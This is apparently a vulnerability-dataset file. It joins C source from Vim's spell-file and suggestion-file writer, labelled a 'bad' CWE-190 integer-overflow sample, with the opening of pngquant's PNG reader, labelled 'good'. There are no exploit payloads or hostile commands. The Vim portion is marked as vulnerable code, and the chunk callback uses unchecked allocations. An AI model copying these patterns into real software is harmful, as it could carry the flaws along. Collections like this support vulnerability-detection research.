/* Allocate a buffer, open a memline for it and create the swap file
* (uses a temp file, not a .swp file). */
spin->si_spellbuf = open_spellbuf();
if (spin->si_spellbuf == NULL)
return FAIL;
/* Use a buffer to store the line info, avoids allocating many small
* pieces of memory. */
ga_init2(&ga, 1, 100);
/* recursively go through the tree */
if (sug_filltable(spin, spin->si_foldroot->wn_sibling, 0, &ga) == -1)
res = FAIL;
ga_clear(&ga);
return res;
}
/*
* Fill the table for one node and its children.
* Returns the wordnr at the start of the node.
* Returns -1 when out of memory.
*/
static int
sug_filltable(
spellinfo_T *spin,
wordnode_T *node,
int startwordnr,
garray_T *gap) /* place to store line of numbers */
{
wordnode_T *p, *np;
int wordnr = startwordnr;
int nr;
int prev_nr;
for (p = node; p != NULL; p = p->wn_sibling)
{
if (p->wn_byte == NUL)
{
gap->ga_len = 0;
prev_nr = 0;
for (np = p; np != NULL && np->wn_byte == NUL; np = np->wn_sibling)
{
if (ga_grow(gap, 10) == FAIL)
return -1;
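		/* wn_flags holds the high 16 bits and wn_region the low 16
		 * bits of the word number, as stored by sug_filltree(). */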
nr = (np->wn_flags << 16) + (np->wn_region & 0xffff);
/* Compute the offset from the previous nr and store the
* offset in a way that it takes a minimum number of bytes.
* It's a bit like utf-8, but without the need to mark
* following bytes. */
nr -= prev_nr;
prev_nr += nr;
gap->ga_len += offset2bytes(nr,
(char_u *)gap->ga_data + gap->ga_len);
}
/* add the NUL byte */
((char_u *)gap->ga_data)[gap->ga_len++] = NUL;
if (ml_append_buf(spin->si_spellbuf, (linenr_T)wordnr,
gap->ga_data, gap->ga_len, TRUE) == FAIL)
return -1;
++wordnr;
/* Remove extra NUL entries, we no longer need them. We don't
	     * bother freeing the nodes, they won't be reused anyway. */
while (p->wn_sibling != NULL && p->wn_sibling->wn_byte == NUL)
p->wn_sibling = p->wn_sibling->wn_sibling;
/* Clear the flags on the remaining NUL node, so that compression
* works a lot better. */
p->wn_flags = 0;
p->wn_region = 0;
}
else
{
wordnr = sug_filltable(spin, p->wn_child, wordnr, gap);
if (wordnr == -1)
return -1;
}
}
return wordnr;
}
/*
* Convert an offset into a minimal number of bytes.
 * Similar to utf_char2bytes(), but use 8 bits in followup bytes and avoid NUL
* bytes.
*/
static int
offset2bytes(int nr, char_u *buf)
{
int rem;
int b1, b2, b3, b4;
/* Split the number in parts of base 255. We need to avoid NUL bytes. */
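    /* Example: nr == 300 gives b1 = 46, b2 = 2, b3 = b4 = 1, which is emitted
     * as the two bytes 0x82 0x2e (0x80 + b2, then b1). */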
b1 = nr % 255 + 1;
rem = nr / 255;
b2 = rem % 255 + 1;
rem = rem / 255;
b3 = rem % 255 + 1;
b4 = rem / 255 + 1;
if (b4 > 1 || b3 > 0x1f) /* 4 bytes */
{
buf[0] = 0xe0 + b4;
buf[1] = b3;
buf[2] = b2;
buf[3] = b1;
return 4;
}
if (b3 > 1 || b2 > 0x3f ) /* 3 bytes */
{
buf[0] = 0xc0 + b3;
buf[1] = b2;
buf[2] = b1;
return 3;
}
if (b2 > 1 || b1 > 0x7f ) /* 2 bytes */
{
buf[0] = 0x80 + b2;
buf[1] = b1;
return 2;
}
/* 1 byte */
buf[0] = b1;
return 1;
}
/*
* Write the .sug file in "fname".
*/
static void
sug_write(spellinfo_T *spin, char_u *fname)
{
FILE *fd;
wordnode_T *tree;
int nodecount;
int wcount;
char_u *line;
linenr_T lnum;
int len;
/* Create the file. Note that an existing file is silently overwritten! */
fd = mch_fopen((char *)fname, "w");
if (fd == NULL)
{
EMSG2(_(e_notopen), fname);
return;
}
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing suggestion file %s ..."), fname);
spell_message(spin, IObuff);
/*
* <SUGHEADER>: <fileID> <versionnr> <timestamp>
*/
if (fwrite(VIMSUGMAGIC, VIMSUGMAGICL, (size_t)1, fd) != 1) /* <fileID> */
{
EMSG(_(e_write));
goto theend;
}
putc(VIMSUGVERSION, fd); /* <versionnr> */
/* Write si_sugtime to the file. */
put_time(fd, spin->si_sugtime); /* <timestamp> */
/*
* <SUGWORDTREE>
*/
spin->si_memtot = 0;
tree = spin->si_foldroot->wn_sibling;
/* Clear the index and wnode fields in the tree. */
clear_node(tree);
/* Count the number of nodes. Needed to be able to allocate the
* memory when reading the nodes. Also fills in index for shared
* nodes. */
nodecount = put_node(NULL, tree, 0, 0, FALSE);
/* number of nodes in 4 bytes */
put_bytes(fd, (long_u)nodecount, 4); /* <nodecount> */
spin->si_memtot += nodecount + nodecount * sizeof(int);
/* Write the nodes. */
(void)put_node(fd, tree, 0, 0, FALSE);
/*
* <SUGTABLE>: <sugwcount> <sugline> ...
*/
wcount = spin->si_spellbuf->b_ml.ml_line_count;
put_bytes(fd, (long_u)wcount, 4); /* <sugwcount> */
for (lnum = 1; lnum <= (linenr_T)wcount; ++lnum)
{
/* <sugline>: <sugnr> ... NUL */
line = ml_get_buf(spin->si_spellbuf, lnum, FALSE);
len = (int)STRLEN(line) + 1;
if (fwrite(line, (size_t)len, (size_t)1, fd) == 0)
{
EMSG(_(e_write));
goto theend;
}
spin->si_memtot += len;
}
/* Write another byte to check for errors. */
if (putc(0, fd) == EOF)
EMSG(_(e_write));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin->si_memtot);
spell_message(spin, IObuff);
theend:
/* close the file */
fclose(fd);
}
/*
* Create a Vim spell file from one or more word lists.
* "fnames[0]" is the output file name.
* "fnames[fcount - 1]" is the last input file name.
* Exception: when "fnames[0]" ends in ".add" it's used as the input file name
* and ".spl" is appended to make the output file name.
*/
void
mkspell(
int fcount,
char_u **fnames,
int ascii, /* -ascii argument given */
int over_write, /* overwrite existing output file */
int added_word) /* invoked through "zg" */
{
char_u *fname = NULL;
char_u *wfname;
char_u **innames;
int incount;
afffile_T *(afile[8]);
int i;
int len;
stat_T st;
int error = FALSE;
spellinfo_T spin;
vim_memset(&spin, 0, sizeof(spin));
spin.si_verbose = !added_word;
spin.si_ascii = ascii;
spin.si_followup = TRUE;
spin.si_rem_accents = TRUE;
ga_init2(&spin.si_rep, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_repsal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_sal, (int)sizeof(fromto_T), 20);
ga_init2(&spin.si_map, (int)sizeof(char_u), 100);
ga_init2(&spin.si_comppat, (int)sizeof(char_u *), 20);
ga_init2(&spin.si_prefcond, (int)sizeof(char_u *), 50);
hash_init(&spin.si_commonwords);
spin.si_newcompID = 127; /* start compound ID at first maximum */
/* default: fnames[0] is output file, following are input files */
innames = &fnames[1];
incount = fcount - 1;
wfname = alloc(MAXPATHL);
if (wfname == NULL)
return;
if (fcount >= 1)
{
len = (int)STRLEN(fnames[0]);
if (fcount == 1 && len > 4 && STRCMP(fnames[0] + len - 4, ".add") == 0)
{
/* For ":mkspell path/en.latin1.add" output file is
* "path/en.latin1.add.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, "%s.spl", fnames[0]);
}
else if (fcount == 1)
{
/* For ":mkspell path/vim" output file is "path/vim.latin1.spl". */
innames = &fnames[0];
incount = 1;
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
}
else if (len > 4 && STRCMP(fnames[0] + len - 4, ".spl") == 0)
{
/* Name ends in ".spl", use as the file name. */
vim_strncpy(wfname, fnames[0], MAXPATHL - 1);
}
else
/* Name should be language, make the file name from it. */
vim_snprintf((char *)wfname, MAXPATHL, SPL_FNAME_TMPL,
fnames[0], spin.si_ascii ? (char_u *)"ascii" : spell_enc());
/* Check for .ascii.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ASCII) != NULL)
spin.si_ascii = TRUE;
/* Check for .add.spl. */
if (strstr((char *)gettail(wfname), SPL_FNAME_ADD) != NULL)
spin.si_add = TRUE;
}
if (incount <= 0)
EMSG(_(e_invarg)); /* need at least output and input names */
else if (vim_strchr(gettail(wfname), '_') != NULL)
EMSG(_("E751: Output file name must not have region name"));
else if (incount > 8)
EMSG(_("E754: Only up to 8 regions supported"));
else
{
/* Check for overwriting before doing things that may take a lot of
* time. */
if (!over_write && mch_stat((char *)wfname, &st) >= 0)
{
EMSG(_(e_exists));
goto theend;
}
if (mch_isdir(wfname))
{
EMSG2(_(e_isadir2), wfname);
goto theend;
}
fname = alloc(MAXPATHL);
if (fname == NULL)
goto theend;
/*
* Init the aff and dic pointers.
* Get the region names if there are more than 2 arguments.
*/
for (i = 0; i < incount; ++i)
{
afile[i] = NULL;
if (incount > 1)
{
len = (int)STRLEN(innames[i]);
if (STRLEN(gettail(innames[i])) < 5
|| innames[i][len - 3] != '_')
{
EMSG2(_("E755: Invalid region in %s"), innames[i]);
goto theend;
}
spin.si_region_name[i * 2] = TOLOWER_ASC(innames[i][len - 2]);
spin.si_region_name[i * 2 + 1] =
TOLOWER_ASC(innames[i][len - 1]);
}
}
spin.si_region_count = incount;
spin.si_foldroot = wordtree_alloc(&spin);
spin.si_keeproot = wordtree_alloc(&spin);
spin.si_prefroot = wordtree_alloc(&spin);
if (spin.si_foldroot == NULL
|| spin.si_keeproot == NULL
|| spin.si_prefroot == NULL)
{
free_blocks(spin.si_blocks);
goto theend;
}
/* When not producing a .add.spl file clear the character table when
* we encounter one in the .aff file. This means we dump the current
* one in the .spl file if the .aff file doesn't define one. That's
* better than guessing the contents, the table will match a
* previously loaded spell file. */
if (!spin.si_add)
spin.si_clear_chartab = TRUE;
/*
* Read all the .aff and .dic files.
* Text is converted to 'encoding'.
* Words are stored in the case-folded and keep-case trees.
*/
for (i = 0; i < incount && !error; ++i)
{
spin.si_conv.vc_type = CONV_NONE;
spin.si_region = 1 << i;
vim_snprintf((char *)fname, MAXPATHL, "%s.aff", innames[i]);
if (mch_stat((char *)fname, &st) >= 0)
{
/* Read the .aff file. Will init "spin->si_conv" based on the
* "SET" line. */
afile[i] = spell_read_aff(&spin, fname);
if (afile[i] == NULL)
error = TRUE;
else
{
/* Read the .dic file and store the words in the trees. */
vim_snprintf((char *)fname, MAXPATHL, "%s.dic",
innames[i]);
if (spell_read_dic(&spin, fname, afile[i]) == FAIL)
error = TRUE;
}
}
else
{
/* No .aff file, try reading the file as a word list. Store
* the words in the trees. */
if (spell_read_wordfile(&spin, innames[i]) == FAIL)
error = TRUE;
}
#ifdef FEAT_MBYTE
/* Free any conversion stuff. */
convert_setup(&spin.si_conv, NULL, NULL);
#endif
}
if (spin.si_compflags != NULL && spin.si_nobreak)
MSG(_("Warning: both compounding and NOBREAK specified"));
if (!error && !got_int)
{
/*
* Combine tails in the tree.
*/
spell_message(&spin, (char_u *)_(msg_compressing));
wordtree_compress(&spin, spin.si_foldroot);
wordtree_compress(&spin, spin.si_keeproot);
wordtree_compress(&spin, spin.si_prefroot);
}
if (!error && !got_int)
{
/*
* Write the info in the spell file.
*/
vim_snprintf((char *)IObuff, IOSIZE,
_("Writing spell file %s ..."), wfname);
spell_message(&spin, IObuff);
error = write_vim_spell(&spin, wfname) == FAIL;
spell_message(&spin, (char_u *)_("Done!"));
vim_snprintf((char *)IObuff, IOSIZE,
_("Estimated runtime memory use: %d bytes"), spin.si_memtot);
spell_message(&spin, IObuff);
/*
* If the file is loaded need to reload it.
*/
if (!error)
spell_reload_one(wfname, added_word);
}
/* Free the allocated memory. */
ga_clear(&spin.si_rep);
ga_clear(&spin.si_repsal);
ga_clear(&spin.si_sal);
ga_clear(&spin.si_map);
ga_clear(&spin.si_comppat);
ga_clear(&spin.si_prefcond);
hash_clear_all(&spin.si_commonwords, 0);
/* Free the .aff file structures. */
for (i = 0; i < incount; ++i)
if (afile[i] != NULL)
spell_free_aff(afile[i]);
/* Free all the bits and pieces at once. */
free_blocks(spin.si_blocks);
/*
* If there is soundfolding info and no NOSUGFILE item create the
* .sug file with the soundfolded word trie.
*/
if (spin.si_sugtime != 0 && !error && !got_int)
spell_make_sugfile(&spin, wfname);
}
theend:
vim_free(fname);
vim_free(wfname);
}
/*
* Display a message for spell file processing when 'verbose' is set or using
* ":mkspell". "str" can be IObuff.
*/
static void
spell_message(spellinfo_T *spin, char_u *str)
{
if (spin->si_verbose || p_verbose > 2)
{
if (!spin->si_verbose)
verbose_enter();
MSG(str);
out_flush();
if (!spin->si_verbose)
verbose_leave();
}
}
/*
* ":[count]spellgood {word}"
* ":[count]spellwrong {word}"
* ":[count]spellundo {word}"
*/
void
ex_spell(exarg_T *eap)
{
spell_add_word(eap->arg, (int)STRLEN(eap->arg), eap->cmdidx == CMD_spellwrong,
eap->forceit ? 0 : (int)eap->line2,
eap->cmdidx == CMD_spellundo);
}
/*
* Add "word[len]" to 'spellfile' as a good or bad word.
*/
void
spell_add_word(
char_u *word,
int len,
int bad,
int idx, /* "zG" and "zW": zero, otherwise index in
'spellfile' */
int undo) /* TRUE for "zug", "zuG", "zuw" and "zuW" */
{
FILE *fd = NULL;
buf_T *buf = NULL;
int new_spf = FALSE;
char_u *fname;
char_u *fnamebuf = NULL;
char_u line[MAXWLEN * 2];
long fpos, fpos_next = 0;
int i;
char_u *spf;
if (idx == 0) /* use internal wordlist */
{
if (int_wordlist == NULL)
{
int_wordlist = vim_tempname('s', FALSE);
if (int_wordlist == NULL)
return;
}
fname = int_wordlist;
}
else
{
/* If 'spellfile' isn't set figure out a good default value. */
if (*curwin->w_s->b_p_spf == NUL)
{
init_spellfile();
new_spf = TRUE;
}
if (*curwin->w_s->b_p_spf == NUL)
{
EMSG2(_(e_notset), "spellfile");
return;
}
fnamebuf = alloc(MAXPATHL);
if (fnamebuf == NULL)
return;
for (spf = curwin->w_s->b_p_spf, i = 1; *spf != NUL; ++i)
{
copy_option_part(&spf, fnamebuf, MAXPATHL, ",");
if (i == idx)
break;
if (*spf == NUL)
{
EMSGN(_("E765: 'spellfile' does not have %ld entries"), idx);
vim_free(fnamebuf);
return;
}
}
/* Check that the user isn't editing the .add file somewhere. */
buf = buflist_findname_exp(fnamebuf);
if (buf != NULL && buf->b_ml.ml_mfp == NULL)
buf = NULL;
if (buf != NULL && bufIsChanged(buf))
{
EMSG(_(e_bufloaded));
vim_free(fnamebuf);
return;
}
fname = fnamebuf;
}
if (bad || undo)
{
/* When the word appears as good word we need to remove that one,
* since its flags sort before the one with WF_BANNED. */
fd = mch_fopen((char *)fname, "r");
if (fd != NULL)
{
while (!vim_fgets(line, MAXWLEN * 2, fd))
{
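		/* Remember where this line starts; after vim_fgets() the
		 * file position is already past it. */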
fpos = fpos_next;
fpos_next = ftell(fd);
if (STRNCMP(word, line, len) == 0
&& (line[len] == '/' || line[len] < ' '))
{
/* Found duplicate word. Remove it by writing a '#' at
* the start of the line. Mixing reading and writing
* doesn't work for all systems, close the file first. */
fclose(fd);
fd = mch_fopen((char *)fname, "r+");
if (fd == NULL)
break;
if (fseek(fd, fpos, SEEK_SET) == 0)
{
fputc('#', fd);
if (undo)
{
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' removed from %s"),
len, word, NameBuff);
}
}
fseek(fd, fpos_next, SEEK_SET);
}
}
if (fd != NULL)
fclose(fd);
}
}
if (!undo)
{
fd = mch_fopen((char *)fname, "a");
if (fd == NULL && new_spf)
{
char_u *p;
/* We just initialized the 'spellfile' option and can't open the
* file. We may need to create the "spell" directory first. We
* already checked the runtime directory is writable in
* init_spellfile(). */
if (!dir_of_file_exists(fname) && (p = gettail_sep(fname)) != fname)
{
int c = *p;
/* The directory doesn't exist. Try creating it and opening
* the file again. */
*p = NUL;
vim_mkdir(fname, 0755);
*p = c;
fd = mch_fopen((char *)fname, "a");
}
}
if (fd == NULL)
EMSG2(_(e_notopen), fname);
else
{
if (bad)
fprintf(fd, "%.*s/!\n", len, word);
else
fprintf(fd, "%.*s\n", len, word);
fclose(fd);
home_replace(NULL, fname, NameBuff, MAXPATHL, TRUE);
smsg((char_u *)_("Word '%.*s' added to %s"), len, word, NameBuff);
}
}
if (fd != NULL)
{
/* Update the .add.spl file. */
mkspell(1, &fname, FALSE, TRUE, TRUE);
/* If the .add file is edited somewhere, reload it. */
if (buf != NULL)
buf_reload(buf, buf->b_orig_mode);
redraw_all_later(SOME_VALID);
}
vim_free(fnamebuf);
}
/*
* Initialize 'spellfile' for the current buffer.
*/
static void
init_spellfile(void)
{
char_u *buf;
int l;
char_u *fname;
char_u *rtp;
char_u *lend;
int aspath = FALSE;
char_u *lstart = curbuf->b_s.b_p_spl;
if (*curwin->w_s->b_p_spl != NUL && curwin->w_s->b_langp.ga_len > 0)
{
buf = alloc(MAXPATHL);
if (buf == NULL)
return;
/* Find the end of the language name. Exclude the region. If there
* is a path separator remember the start of the tail. */
for (lend = curwin->w_s->b_p_spl; *lend != NUL
&& vim_strchr((char_u *)",._", *lend) == NULL; ++lend)
if (vim_ispathsep(*lend))
{
aspath = TRUE;
lstart = lend + 1;
}
/* Loop over all entries in 'runtimepath'. Use the first one where we
* are allowed to write. */
rtp = p_rtp;
while (*rtp != NUL)
{
if (aspath)
/* Use directory of an entry with path, e.g., for
* "/dir/lg.utf-8.spl" use "/dir". */
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lstart - curbuf->b_s.b_p_spl - 1);
else
/* Copy the path from 'runtimepath' to buf[]. */
copy_option_part(&rtp, buf, MAXPATHL, ",");
if (filewritable(buf) == 2)
{
/* Use the first language name from 'spelllang' and the
* encoding used in the first loaded .spl file. */
if (aspath)
vim_strncpy(buf, curbuf->b_s.b_p_spl,
lend - curbuf->b_s.b_p_spl);
else
{
/* Create the "spell" directory if it doesn't exist yet. */
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l, "/spell");
if (filewritable(buf) != 2)
vim_mkdir(buf, 0755);
l = (int)STRLEN(buf);
vim_snprintf((char *)buf + l, MAXPATHL - l,
"/%.*s", (int)(lend - lstart), lstart);
}
l = (int)STRLEN(buf);
fname = LANGP_ENTRY(curwin->w_s->b_langp, 0)
->lp_slang->sl_fname;
vim_snprintf((char *)buf + l, MAXPATHL - l, ".%s.add",
fname != NULL
&& strstr((char *)gettail(fname), ".ascii.") != NULL
? (char_u *)"ascii" : spell_enc());
set_option_value((char_u *)"spellfile", 0L, buf, OPT_LOCAL);
break;
}
aspath = FALSE;
}
vim_free(buf);
}
}
/*
* Set the spell character tables from strings in the affix file.
*/
static int
set_spell_chartab(char_u *fol, char_u *low, char_u *upp)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
char_u *pf = fol, *pl = low, *pu = upp;
int f, l, u;
clear_spell_chartab(&new_st);
while (*pf != NUL)
{
if (*pl == NUL || *pu == NUL)
{
EMSG(_(e_affform));
return FAIL;
}
#ifdef FEAT_MBYTE
f = mb_ptr2char_adv(&pf);
l = mb_ptr2char_adv(&pl);
u = mb_ptr2char_adv(&pu);
#else
f = *pf++;
l = *pl++;
u = *pu++;
#endif
/* Every character that appears is a word character. */
if (f < 256)
new_st.st_isw[f] = TRUE;
if (l < 256)
new_st.st_isw[l] = TRUE;
if (u < 256)
new_st.st_isw[u] = TRUE;
/* if "LOW" and "FOL" are not the same the "LOW" char needs
* case-folding */
if (l < 256 && l != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[l] = f;
}
/* if "UPP" and "FOL" are not the same the "UPP" char needs
* case-folding, it's upper case and the "UPP" is the upper case of
* "FOL" . */
if (u < 256 && u != f)
{
if (f >= 256)
{
EMSG(_(e_affrange));
return FAIL;
}
new_st.st_fold[u] = f;
new_st.st_isu[u] = TRUE;
new_st.st_upper[f] = u;
}
}
if (*pl != NUL || *pu != NUL)
{
EMSG(_(e_affform));
return FAIL;
}
return set_spell_finish(&new_st);
}
/*
* Set the spell character tables from strings in the .spl file.
*/
static void
set_spell_charflags(
char_u *flags,
int cnt, /* length of "flags" */
char_u *fol)
{
/* We build the new tables here first, so that we can compare with the
* previous one. */
spelltab_T new_st;
int i;
char_u *p = fol;
int c;
clear_spell_chartab(&new_st);
for (i = 0; i < 128; ++i)
{
if (i < cnt)
{
new_st.st_isw[i + 128] = (flags[i] & CF_WORD) != 0;
new_st.st_isu[i + 128] = (flags[i] & CF_UPPER) != 0;
}
if (*p != NUL)
{
#ifdef FEAT_MBYTE
c = mb_ptr2char_adv(&p);
#else
c = *p++;
#endif
new_st.st_fold[i + 128] = c;
if (i + 128 != c && new_st.st_isu[i + 128] && c < 256)
new_st.st_upper[c] = i + 128;
}
}
(void)set_spell_finish(&new_st);
}
static int
set_spell_finish(spelltab_T *new_st)
{
int i;
if (did_set_spelltab)
{
/* check that it's the same table */
for (i = 0; i < 256; ++i)
{
if (spelltab.st_isw[i] != new_st->st_isw[i]
|| spelltab.st_isu[i] != new_st->st_isu[i]
|| spelltab.st_fold[i] != new_st->st_fold[i]
|| spelltab.st_upper[i] != new_st->st_upper[i])
{
EMSG(_("E763: Word characters differ between spell files"));
return FAIL;
}
}
}
else
{
/* copy the new spelltab into the one being used */
spelltab = *new_st;
did_set_spelltab = TRUE;
}
return OK;
}
/*
* Write the table with prefix conditions to the .spl file.
* When "fd" is NULL only count the length of what is written.
*/
static int
write_spell_prefcond(FILE *fd, garray_T *gap)
{
int i;
char_u *p;
int len;
int totlen;
size_t x = 1; /* collect return value of fwrite() */
if (fd != NULL)
put_bytes(fd, (long_u)gap->ga_len, 2); /* <prefcondcnt> */
totlen = 2 + gap->ga_len; /* length of <prefcondcnt> and <condlen> bytes */
for (i = 0; i < gap->ga_len; ++i)
{
/* <prefcond> : <condlen> <condstr> */
p = ((char_u **)gap->ga_data)[i];
if (p != NULL)
{
len = (int)STRLEN(p);
if (fd != NULL)
{
fputc(len, fd);
x &= fwrite(p, (size_t)len, (size_t)1, fd);
}
totlen += len;
}
else if (fd != NULL)
fputc(0, fd);
}
return totlen;
}
/*
* Use map string "map" for languages "lp".
*/
static void
set_map_str(slang_T *lp, char_u *map)
{
char_u *p;
int headc = 0;
int c;
int i;
if (*map == NUL)
{
lp->sl_has_map = FALSE;
return;
}
lp->sl_has_map = TRUE;
/* Init the array and hash tables empty. */
for (i = 0; i < 256; ++i)
lp->sl_map_array[i] = 0;
#ifdef FEAT_MBYTE
hash_init(&lp->sl_map_hash);
#endif
/*
* The similar characters are stored separated with slashes:
* "aaa/bbb/ccc/". Fill sl_map_array[c] with the character before c and
* before the same slash. For characters above 255 sl_map_hash is used.
*/
for (p = map; *p != NUL; )
{
#ifdef FEAT_MBYTE
c = mb_cptr2char_adv(&p);
#else
c = *p++;
#endif
if (c == '/')
headc = 0;
else
{
if (headc == 0)
headc = c;
#ifdef FEAT_MBYTE
/* Characters above 255 don't fit in sl_map_array[], put them in
	     * the hash table.  Each entry is the char, a NUL, the headchar and
* a NUL. */
if (c >= 256)
{
int cl = mb_char2len(c);
int headcl = mb_char2len(headc);
char_u *b;
hash_T hash;
hashitem_T *hi;
b = alloc((unsigned)(cl + headcl + 2));
if (b == NULL)
return;
mb_char2bytes(c, b);
b[cl] = NUL;
mb_char2bytes(headc, b + cl + 1);
b[cl + 1 + headcl] = NUL;
hash = hash_hash(b);
hi = hash_lookup(&lp->sl_map_hash, b, hash);
if (HASHITEM_EMPTY(hi))
hash_add_item(&lp->sl_map_hash, hi, b, hash);
else
{
/* This should have been checked when generating the .spl
* file. */
EMSG(_("E783: duplicate char in MAP entry"));
vim_free(b);
}
}
else
#endif
lp->sl_map_array[c] = headc;
}
}
}
#endif /* FEAT_SPELL */
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_3153_0 |
crossvul-cpp_data_good_5162_0 | /*---------------------------------------------------------------------------
pngquant: RGBA -> RGBA-palette quantization program rwpng.c
---------------------------------------------------------------------------
© 1998-2000 by Greg Roelofs.
© 2009-2015 by Kornel Lesiński.
All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <limits.h>
#include "png.h" /* if this include fails, you need to install libpng (e.g. libpng-devel package) and run ./configure */
#include "rwpng.h"
#if USE_LCMS
#include "lcms2.h"
#endif
#ifndef Z_BEST_COMPRESSION
#define Z_BEST_COMPRESSION 9
#endif
#ifndef Z_BEST_SPEED
#define Z_BEST_SPEED 1
#endif
#ifdef _OPENMP
#include <omp.h>
#else
#define omp_get_max_threads() 1
#endif
#if PNG_LIBPNG_VER < 10500
typedef png_const_charp png_const_bytep;
#endif
static void rwpng_error_handler(png_structp png_ptr, png_const_charp msg);
int rwpng_read_image24_cocoa(FILE *infile, png24_image *mainprog_ptr);
void rwpng_version_info(FILE *fp)
{
const char *pngver = png_get_header_ver(NULL);
#if USE_COCOA
fprintf(fp, " Color profiles are supported via Cocoa. Using libpng %s.\n", pngver);
#elif USE_LCMS
fprintf(fp, " Color profiles are supported via Little CMS. Using libpng %s.\n", pngver);
#else
fprintf(fp, " Compiled with no support for color profiles. Using libpng %s.\n", pngver);
#endif
#if PNG_LIBPNG_VER < 10600
if (strcmp(pngver, "1.3.") < 0) {
fputs("\nWARNING: Your version of libpng is outdated and may produce corrupted files.\n"
"Please recompile pngquant with the current version of libpng (1.6 or later).\n", fp);
} else if (strcmp(pngver, "1.6.") < 0) {
#if defined(PNG_UNKNOWN_CHUNKS_SUPPORTED)
fputs("\nWARNING: Your version of libpng is old and has buggy support for custom chunks.\n"
"Please recompile pngquant with the current version of libpng (1.6 or later).\n", fp);
#endif
}
#endif
}
struct rwpng_read_data {
FILE *const fp;
png_size_t bytes_read;
};
#if !USE_COCOA
static void user_read_data(png_structp png_ptr, png_bytep data, png_size_t length)
{
struct rwpng_read_data *read_data = (struct rwpng_read_data *)png_get_io_ptr(png_ptr);
png_size_t read = fread(data, 1, length, read_data->fp);
if (!read) {
png_error(png_ptr, "Read error");
}
read_data->bytes_read += read;
}
#endif
struct rwpng_write_state {
FILE *outfile;
png_size_t maximum_file_size;
png_size_t bytes_written;
pngquant_error retval;
};
static void user_write_data(png_structp png_ptr, png_bytep data, png_size_t length)
{
struct rwpng_write_state *write_state = (struct rwpng_write_state *)png_get_io_ptr(png_ptr);
if (SUCCESS != write_state->retval) {
return;
}
if (!fwrite(data, length, 1, write_state->outfile)) {
write_state->retval = CANT_WRITE_ERROR;
}
write_state->bytes_written += length;
}
static void user_flush_data(png_structp png_ptr)
{
// libpng never calls this :(
}
static png_bytepp rwpng_create_row_pointers(png_infop info_ptr, png_structp png_ptr, unsigned char *base, unsigned int height, png_size_t rowbytes)
{
if (!rowbytes) {
rowbytes = png_get_rowbytes(png_ptr, info_ptr);
}
png_bytepp row_pointers = malloc(height * sizeof(row_pointers[0]));
if (!row_pointers) return NULL;
for(size_t row = 0; row < height; row++) {
row_pointers[row] = base + row * rowbytes;
}
return row_pointers;
}
#if !USE_COCOA
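/* Stash unknown/ancillary chunks on a linked list so they can be copied to
* the output file later; iCCP, cHRM and gAMA are reported as "not handled"
* so libpng itself still parses them for color management. */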
static int read_chunk_callback(png_structp png_ptr, png_unknown_chunkp in_chunk)
{
if (0 == memcmp("iCCP", in_chunk->name, 5) ||
0 == memcmp("cHRM", in_chunk->name, 5) ||
0 == memcmp("gAMA", in_chunk->name, 5)) {
return 0; // not handled
}
struct rwpng_chunk **head = (struct rwpng_chunk **)png_get_user_chunk_ptr(png_ptr);
struct rwpng_chunk *chunk = malloc(sizeof(struct rwpng_chunk));
memcpy(chunk->name, in_chunk->name, 5);
chunk->size = in_chunk->size;
chunk->location = in_chunk->location;
chunk->data = in_chunk->size ? malloc(in_chunk->size) : NULL;
if (in_chunk->size) {
memcpy(chunk->data, in_chunk->data, in_chunk->size);
}
chunk->next = *head;
*head = chunk;
return 1; // marks as "handled", libpng won't store it
}
#endif
/*
retval:
0 = success
21 = bad sig
22 = bad IHDR
24 = insufficient memory
25 = libpng error (via longjmp())
26 = wrong PNG color type (no alpha channel)
*/
#if !USE_COCOA
static void rwpng_warning_stderr_handler(png_structp png_ptr, png_const_charp msg) {
fprintf(stderr, " libpng warning: %s\n", msg);
}
static void rwpng_warning_silent_handler(png_structp png_ptr, png_const_charp msg) {
}
static pngquant_error rwpng_read_image24_libpng(FILE *infile, png24_image *mainprog_ptr, int verbose)
{
png_structp png_ptr = NULL;
png_infop info_ptr = NULL;
png_size_t rowbytes;
int color_type, bit_depth;
png_ptr = png_create_read_struct(PNG_LIBPNG_VER_STRING, mainprog_ptr,
